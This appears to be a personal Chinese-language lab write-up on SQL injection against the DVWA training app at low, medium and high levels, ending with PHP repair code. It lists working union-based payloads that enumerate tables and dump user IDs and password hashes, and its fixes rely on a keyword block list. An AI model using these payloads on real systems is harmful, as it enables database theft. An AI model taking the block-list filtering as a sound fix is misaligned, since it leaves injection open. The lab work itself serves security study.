sql injection
0x01 low
sql语句没有过滤
经典注入,通过逻辑or为真相当于select * from users where true,99换成1也成
用union select 对齐列数,查看数据库信息
1’ union select 1,2#
order by探测对齐列数更方便
1’ or 1=1 order by 1,2#
比union select多一个判断
考虑编码
1’ union select 1,group_concat(table_name) COLLATE utf8_general_ci from information_schema.tables where table_schema=‘dvwa’#
还得是stack overflow nb https://stackoverflow.com/questions/20456152/mysql-error-illegal-mix-of-collations-for-operation-union
表guestbook, users
1’ union select 1,group_concat(column_name) COLLATE utf8_general_ci from information_schema.columns where table_name=‘users’#
列: user_id,first_name,last_name,user,password,avatar,last_login,failed_login
1’ union select group_concat(user_id),group_concat(password) COLLATE utf8_general_ci from dvwa.users #
1’ or 1=1 union select group_concat(user_id),group_concat(password) COLLATE utf8_general_ci from dvwa.users #
拿到密码
和直接在数据库中看到的一致
0x02 medium
从select元素中获取值,提交,显示
抓包观察,修改,发现存在注入
数字型注入
order by 3 报错,说明有两列select
1 union select 1, group_concat(table_schema) COLLATE utf8_general_ci from information_schema.tables where table_schema = database()
1 union select 1, group_concat(table_name) COLLATE utf8_general_ci from information_schema.tables where table_schema = database()#
id=1 union select 1, group_concat(column_name) COLLATE utf8_general_ci from information_schema.columns where table_name = 0x7573657273#
1 or 1=1 union select group_concat(user_id),group_concat(password) from users
搞定
数字型注入,单引号被过滤
0x03 high
使用limit 1限制显示,使用#注释即可
输入和回显不在同一页面可防止sqlmap攻击
1’ union select 1,group_concat(table_name) COLLATE utf8_general_ci from information_schema.tables where table_schema = ‘dvwa’#
1’ union select 1,group_concat(column_name) COLLATE utf8_general_ci from information_schema.columns where table_name = ‘users’#
1’ union select group_concat(user_id),group_concat(password) COLLATE utf8_general_ci from users #
0x04 Repair 漏洞修复
修复漏洞,同时保证保证功能完整
0x0401 Chars 字符型
过滤关键字,发现不合规的输入就die终止
使用str_replace要优于preg_replace,它将所有的$search替换为$replace,$count显示替换的次数
非法输入
不可以打哦
详细代码
$suspects = array("'"," ","and","or","union","select","#","\\",";","order","by","--","\"");
$allnull = array();
for ($i = 0;$i<count($suspects);$i += 1){
array_push($allnull,'Hacker');
}
$count = 0;
$id = $_REQUEST[ 'id' ];
$id = str_replace($suspects,$allnull,$id,$count);
if($count>0){
die("no, can not hack");
}
0x0402 Numbers 数字型
intival将串转为数字,is_numberic判断串是否为数字
用正则匹配所有数字,提取出来重新组成串
这个串中只有数字,如果抓包修改为id=3 or 1=1那么id会变成311。虽然是一个不合法的数据,也可以阻止了union select恶意查询
打开注释内容,更有效。它检测到非数字就会die终止程序
// $judge = is_numeric($id);
// if($judge== false){
// die("sorry, can not pass");
// }
preg_match_all('!\d+!', $id, $matches);
$numbers = $matches[0];
$id = implode('',$numbers);